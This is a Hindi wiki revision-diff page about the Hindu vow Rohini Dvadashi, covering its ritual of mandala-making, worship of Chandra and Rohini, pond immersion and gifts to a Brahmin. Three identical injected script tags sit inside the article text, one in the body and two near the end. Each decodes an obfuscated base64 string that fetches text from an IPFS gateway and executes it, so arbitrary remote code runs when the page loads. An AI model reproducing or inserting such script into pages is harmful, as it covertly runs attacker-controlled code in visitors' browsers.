Difference between revisions of "रोहिणी द्वादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (रोहिणीद्वादशी का नाम बदलकर रोहिणी द्वादशी कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(7 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*[[श्रावण]] [[शुक्ल पक्ष]] की [[एकादशी]] पर कर्ता (पुरुष या स्त्री) किसी तालाब या उसके समान किसी अन्य स्थान पर [[गोबर]] से एक मण्डल बनाता है तथा [[चन्द्र देव|चन्द्र]] एवं [[रोहिणी]] की आकृति बना कर उसकी पूजा करता है।
+
*[[श्रावण]] [[शुक्ल पक्ष]] की [[एकादशी]] पर कर्ता (पुरुष या स्त्री) किसी तालाब या उसके समान किसी अन्य स्थान पर गोबर से एक मण्डल बनाता है तथा [[चन्द्र देवता|चन्द्र]] एवं [[रोहिणी]] की आकृति बना कर उसकी पूजा करता है।
*[[नैवेद्य]] अर्पण कर उसे किसी [[ब्राह्मण]] को दे देता है, इसके उपरान्त [[तालाब]] में प्रवेश करता है, चन्द्र एवं रोहिणी का ध्यान करता है, [[जल]] में पिसे हुए [[माष]] की 100 गोलियाँ घी के साथ पाँच मोदक खाता है, बाहर निकलने पर किसी ब्राह्मण को भोजन एवं वस्त्र देता है।
+
*[[नैवेद्य]] अर्पण कर उसे किसी [[ब्राह्मण]] को दे देता है, इसके उपरान्त तालाब में प्रवेश करता है, चन्द्र एवं रोहिणी का ध्यान करता है, [[जल]] में पिसे हुए [[माष]] की 100 गोलियाँ घी के साथ पाँच मोदक खाता है, बाहर निकलने पर किसी ब्राह्मण को भोजन एवं वस्त्र देता है।
*ऐसा प्रति वर्ष किया जाना चाहिए। <ref>हेमाद्रि (व्रत खण्ड 1,1113-1114, भविष्योत्तरपुराण से उद्धरण)</ref>
+
*ऐसा प्रति वर्ष किया जाना चाहिए।<ref>हेमाद्रि (व्रत खण्ड 1,1113-1114, भविष्योत्तरपुराण से उद्धरण</ref>
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:39, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • shravan shukl paksh ki ekadashi par karta (purush ya stri) kisi talab ya usake saman kisi any sthan par gobar se ek mandal banata hai tatha chandr evan rohini ki akriti bana kar usaki pooja karata hai.
  • naivedy arpan kar use kisi brahman ko de deta hai, isake uparant talab mean pravesh karata hai, chandr evan rohini ka dhyan karata hai, jal mean pise hue mash ki 100 goliyaan ghi ke sath paanch modak khata hai, bahar nikalane par kisi brahman ko bhojan evan vastr deta hai.
  • aisa prati varsh kiya jana chahie.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat khand 1,1113-1114, bhavishyottarapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>